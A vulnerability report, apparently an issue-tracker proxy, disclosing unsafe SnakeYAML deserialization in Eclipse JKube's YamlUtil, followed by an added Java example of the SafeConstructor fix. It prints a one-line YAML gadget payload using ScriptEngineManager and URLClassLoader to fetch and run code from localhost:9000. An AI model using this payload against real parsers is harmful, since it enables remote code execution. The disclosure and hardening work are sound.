From the Security Team Inbox:
--
https://github.com/eclipse/jkube/blob/master/jkube-kit/common/src/main/java/org/eclipse/jkube/kit/common/util/YamlUtil.java#L112 uses an insecure way to construct the Yaml object, leading to remote code execution. Here is sample code which would invoke malicious code hosted at localhost:9000.
String code = "maps: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:9000/\"]]]]";
YamlUtil.getPropertiesFromYamlString(code);
Please refer to SafeConstructor() and https://bitbucket.org/asomov/snakeyaml/wiki/Documentation#markdown-header-restrict-classes-to-be-loaded on using the API securely.
Reference: https://cwe.mitre.org/data/definitions/502.html
--
There's help for managing vulnerabilities in the handbook.
https://www.eclipse.org/projects/handbook/#vulnerability
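The hardened form the report asks for, as an added example that is not jkube's code: building the SnakeYAML parser with SafeConstructor so that explicit !!class tags in untrusted input are rejected instead of instantiating arbitrary classes. It assumes SnakeYAML 1.x (no-argument SafeConstructor, as referenced above) and uses constructed sample documents.

```java
// Added example, not code from jkube. Assumes SnakeYAML 1.x, where
// SafeConstructor has a no-argument constructor.
import java.util.Map;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.ConstructorException;
import org.yaml.snakeyaml.constructor.SafeConstructor;

public class SafeYamlLoad {

    // Hardened loader: SafeConstructor only knows the standard YAML types
    // (maps, sequences, scalars), so a tag naming a Java class has no
    // registered constructor and parsing fails instead of instantiating it.
    static Map<String, Object> loadUntrusted(String doc) {
        Yaml yaml = new Yaml(new SafeConstructor());
        return yaml.load(doc);
    }

    public static void main(String[] args) {
        // Constructed sample inputs for this demo.
        String plain = "maps:\n  key: value\n";
        String tagged = "maps: !!java.util.ArrayList [a, b]\n";

        // Ordinary YAML is parsed into plain maps, lists and strings.
        System.out.println("plain document -> " + loadUntrusted(plain));

        // A document carrying an explicit Java class tag is refused.
        try {
            loadUntrusted(tagged);
            System.out.println("unexpected: tagged document was accepted");
        } catch (ConstructorException e) {
            System.out.println("rejected tagged document: " + e.getMessage());
        }
    }
}
```

In YamlUtil the corresponding change is to construct the parser with `new Yaml(new SafeConstructor())` wherever a default `new Yaml()` is used on input that did not originate from trusted project files.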
Description
Proxy issue for https://bugs.eclipse.org/bugs/show_bug.cgi?id=561261